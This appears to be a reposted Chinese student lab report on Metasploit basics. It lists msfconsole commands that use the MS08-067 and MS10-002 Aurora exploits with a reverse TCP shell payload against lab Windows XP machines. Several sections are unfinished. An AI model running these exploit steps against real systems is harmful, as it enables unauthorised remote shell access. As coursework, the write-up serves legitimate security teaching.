码迷,mamicode.com
首页 > 其他好文 > 详细

20155320《网络对抗》MSF基础应用

时间:2018-04-28 22:20:04      阅读:190      评论:0      收藏:0      [点我收藏+]

标签:play   ons   tab   固定   过程   OLE   查看   成功   第一个   

20155320《网络对抗》MSF基础应用

基础问题回答

(1)用自己的话解释什么是exploit,payload,encode

实践过程

  • 使用到的虚拟机IP
虚拟机 IP地址
靶机1 Windows XP 192.168.63.130
靶机2 Vivian xp 192.168.63.129
靶机 192.168.63.131
攻击机 kali2 192.168.63.133

技术分享图片

技术分享图片

技术分享图片

技术分享图片

1.1一个主动攻击实践——ms08_067漏洞攻击;

这次需要用到靶机和kali

  • 在kali的终端中输入msfconsole进入控制台

  • 输入use exploit/windows/smb/ms08_067_netapi 使用该模块

  • show targets查看可以被攻击的靶机的操作系统型号,由于我不是很 清楚我的XP型号,所以我选了0自动匹配

  • show playload可以查看可使用的载荷

技术分享图片

  • set payload generic/shell_reverse_tcp,tcp反向回连

  • 输入如下完成配置

set LHOST 192.168.63.133 此IP是kali的IP
set LPORT 5320 端口
set RHOST 192.168.63.131 此IP是靶机WIN XP的IP,特定漏洞端口已经固定

技术分享图片

  • show targets查看可以被攻击的靶机的操作系统型号,由于我不是很 清楚我的XP型号,所以我选了0自动匹配
    ,输入set target 0

技术分享图片

  • 输入exploit 进行攻击

技术分享图片

  • 然后成功攻击的标志是出现如下结果,成功获得了XP靶机的shellcode,输入命令ipconfig可以看到和在XP上一样的结果

技术分享图片

MS10_002_aurora漏洞攻击;

  • 之前的配置和第一个主动攻击实验是一样的命令,依次输入如下即可
msfconsole
use exploit/windows/browser/ms10_002_aurora
set payload generic/shell_reverse_tcp
set LHOST 192.168.63.133 //设置kali攻击IP,
set RHOST 192.168.63.131
set SRVPORT 5320
  • 查看配置项,确认无误

技术分享图片

  • 输入exploit 运行,成功生成了一个URL

技术分享图片

  • 在靶机上的IE里输入URL,并

1.3 一个针对客户端的攻击,如Adobe;

1.4 成功应用任何一个辅助模块。

实验总结

20155320《网络对抗》MSF基础应用

标签:play   ons   tab   固定   过程   OLE   查看   成功   第一个   

原文地址:https://www.cnblogs.com/ljq1997/p/8969593.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!